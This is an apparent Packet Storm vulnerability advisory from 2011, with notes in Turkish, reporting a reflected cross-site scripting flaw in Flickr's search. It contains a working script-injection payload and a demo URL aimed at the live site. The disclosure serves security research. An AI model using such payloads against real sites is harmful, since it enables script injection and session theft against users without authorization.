Flickr.com Cross Site Scripting

2011-08-04T00:00:00
ID PACKETSTORM:103726
Type packetstorm
Reporter SOLVER
Modified 2011-08-04T00:00:00

Description

                                        
                                            `<------------------- header data start ------------------- >  
#############################################################  
Flickr.com XSS Vulnerability   
#############################################################  
  
# Author : SOLVER ~ Bug Researchers  
  
# Date : 03.08.2011  
  
# Name : Flickr Photo Sharing  
  
# Bug Type : XSS (Cross Site Scripting)  
  
# Infection : Hedef sistem uzerinde zararli Javascript kodlari calistirilabilir.  
  
# Explanation : Flickr.com sitesi uzerinde bulunan arama motorunda zararli kodlar calistirmaya yarayan bir bugdur.  
  
# Example Exploit : "></TITLE><SCRIPT>alert("SOLVER");</SCRIPT>  
  
[+] Site: www.flickr.com  
  
[+] Demo: http://www.flickr.com/search/?w=all&q=%22%3E%3C/TITLE%3E%3CSCRIPT%3Ealert%28%22SOLVER%22%29;%3C/SCRIPT%3E&m=text  
  
# Bug Fix Advice : Zararli Karakterler Filtrenmelidir.  
#############################################################  
`